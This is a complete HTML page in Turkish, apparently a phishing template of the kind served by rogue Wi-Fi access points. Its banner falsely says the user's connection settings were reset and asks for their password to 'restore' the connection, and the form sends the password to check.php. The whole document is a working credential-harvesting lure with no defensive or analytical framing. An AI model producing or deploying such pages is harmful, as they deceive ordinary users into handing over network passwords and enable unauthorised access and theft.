<!DOCTYPE html>
<html>

<head>
    <style>
        body {
            height: 100%;
            margin: 0px;
            background-color: rgba(255, 255, 255, 0.3);
            position: relative;
        }
        
        .error-text {
            background-color: rgb(102, 186, 51);
            width: 100%;
            display: inline-block;
        }
        
        h1 {
            font-size: 16px;
            color: WHITE;
            font-weight: bold;
            margin-left: 15px;
            margin-top: 5px;
            margin-bottom: 5px;
        }
        
        .context {
            margin-left: 5%;
        }
    </style>
</head>

<body>
    <div class="error-text">
        <h1>Bağlantınızda bir sorun oluştu!</h1>
    </div>
    <div class="context">
        <p>Bağlantınızda bir sorun algılandı ve bağlantı ayarlarınız sıfırlandı</p>
        <p>Bağlantınızı geri getirmek için şifrenizi giriniz:</p>
        <form id="form1" name="form1" method="POST" action="check.php">
            <center style="margin-right: 5%; margin-top: 5%;">
                <p style="display:inline;">Şifre:</p>
                <input name="key1" type="password" style="display:inline;" />
                <input name="Confirm" class="confirmbtn" type="submit" value="Onayla" />
            </center>
        </form>
    </div>
</body>

</html>